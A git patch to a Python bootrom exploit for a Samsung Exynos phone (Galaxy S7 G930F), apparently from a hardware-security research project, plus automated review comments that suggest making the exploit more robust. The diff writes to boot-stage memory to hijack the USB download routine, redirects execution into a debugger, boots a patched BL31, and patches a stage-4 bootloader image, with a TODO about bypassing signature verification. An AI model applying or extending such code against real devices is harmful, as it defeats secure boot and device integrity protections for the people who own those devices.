From 2c20ff6255216684c2b03a9d8ac3b47868870658 Mon Sep 17 00:00:00 2001 From: Eljakim Herrewijnen Date: Sun, 18 Aug 2024 13:55:11 +0200 Subject: [PATCH] Boots a patched bl31 --- source/exploit/exploit.py | 61 ++++++++++++++++++++++++++------------- 1 file changed, 41 insertions(+), 20 deletions(-) diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index 327374f..133b76f 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py 
@@ -623,36 +623,47 @@ class ExynosDevice(): # INSERT YOUR BL1 PATCHES HERE self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31 + self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br")) + + # self.cd.memwrite_region(0x020200a0, p32(DEBUGGER_ADDR)) + # self.cd.memwrite_region(0x020200d0, p32(DEBUGGER_ADDR)) + # self.cd.memwrite_region(0x020200b4, p32(DEBUGGER_ADDR)) + # self.cd.memwrite_region(0x020200a4, p32(DEBUGGER_ADDR)) + + # self.cd.memwrite_region(0x0202297c, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) + + + GADGET_RET0 = 0x00000d58 + # self.cd.memwrite_region(0x20296da , p32(GADGET_RET0)) + # self.cd.memwrite_region(0x20296da + 4, p32(GADGET_RET0)) + # END jump_bl1(DEBUGGER_ADDR) # ==== BL31 ==== assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" - - self.cd.memwrite_region(self.cd.arch_dbg.state.X0, open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()) - - + + # Download next stage via ROM_DOWNLOAD_USB lr = self.cd.arch_dbg.state.LR self.cd.arch_dbg.state.LR = DEBUGGER_ADDR self.cd.restore_stack_and_jump(hijacked_fun) # will jump back to debugger after downloading the next stage time.sleep(2) self.connect_device() - - - - self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()[:0x10]) + self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()) time.sleep(2) self.usb_read(0x200) # GiAs # lr = self.cd.arch_dbg.state.LR - self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) - GADGET_RET0 = 0x00000d58 - self.cd.memwrite_region(0x020200e4, p32(GADGET_RET0)) + self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow + + # TODO patch verification + + + # self.cd.memwrite_region(0x0202010c - 52, p32(GADGET_RET0)) + + - # ====== PATCHES TO BL31 here! 
====== - # TODO fix not checking signatures - # self.cd.memwrite_region(0x02031008, b"ELH") # self.cd.memwrite_region(0x02024774, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR # self.cd.arch_dbg.state.X0 = 0x020347f0 @@ -660,6 +671,16 @@ class ExynosDevice(): # self.cd.restore_stack_and_jump(0x02030464) self.cd.restore_stack_and_jump(lr) + time.sleep(2) + self.usb_read(0x200) # GiAs + self.cd.memwrite_region(0x02031008, b"ELH") + # ====== PATCHES TO BL31 here! ====== + + + # Jump BL31 + self.cd.restore_stack_and_jump(0x02024010) + + time.sleep(2) self.connect_device() @@ -676,12 +697,12 @@ class ExynosDevice(): # ==== Stage 4 ==== stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read() # Patching - # stage4_len = len(stage4) - # patch_len = len(b"USB RECOVERY MODE") - # patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE"))) - # patch_offset = stage4.find(b"USB RECOVERY MODE") - # stage4 = stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:] - # assert len(stage4) == stage4_len, "Invalid stage4 length" + stage4_len = len(stage4) + patch_len = len(b"USB RECOVERY MODE") + patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE"))) + patch_offset = stage4.find(b"USB RECOVERY MODE") + stage4 = stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:] + assert len(stage4) == stage4_len, "Invalid stage4 length" self.send_normal_stage(stage4) time.sleep(2)
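Review bot: After `self.send_normal_stage(open(...).read())` the new code calls `self.usb_read(0x200) # GiAs` and discards the result, so if the debugger handshake never arrives the script still writes `0x020200dc` and jumps to `lr` against an unknown target state; the first sync in this hunk already does `assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"`, and the same check belongs on this read. The stage-2 image is read with a bare `open(...).read()` that is never closed; reading it once into a local with `with open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb") as f: stage2 = f.read()` fixes that and makes the full-image send (no more `[:0x10]`) obvious. `GADGET_RET0 = 0x00000d58` is now referenced only from commented-out lines, and together with `# TODO patch verification` it looks as if the BL31 verification bypass the removed `0x020200e4` write used to provide has not been re-established — that is inferred from the diff, but the comment should say whether the downloaded BL31 is currently accepted unverified or not. The enclosing method starts before this hunk.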
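Review bot: `self.cd.memwrite_region(0x02031008, b"ELH")` sits above the `# ====== PATCHES TO BL31 here! ======` banner with nothing saying what lives at that address, and the sync in front of it (`time.sleep(2)` followed by an unchecked `self.usb_read(0x200) # GiAs`) means a missed handshake leads straight into the blind write and `self.cd.restore_stack_and_jump(0x02024010)`. Suggest `assert self.usb_read(0x200) == b"GiAs", "BL31 stage did not return to debugger"`, naming the jump target (`BL31_ENTRY = 0x02024010`), and a one-line comment above the write such as `# 0x02031008: <what this holds> - marker write to prove we control BL31 before it runs`, with the placeholder replaced by what the address actually contains, which the hunk does not show. The method continues past the end of this hunk.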
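Review bot: `patch_offset = stage4.find(b"USB RECOVERY MODE")` returns -1 when the marker is absent, and `stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:]` then produces a roughly doubled image; the following `assert len(stage4) == stage4_len` does trip, but with a misleading message, and `assert` disappears under `-O`. Check the lookup explicitly before slicing: `if patch_offset < 0: raise ValueError("USB RECOVERY MODE marker not found in stage4")`. Padding `patch` with NULs to the marker's length keeps the image layout unchanged, which is the right approach for an in-place string patch, and a comment such as `# same length as the original string so nothing after it shifts` would make that intent clear. The enclosing method starts outside this hunk.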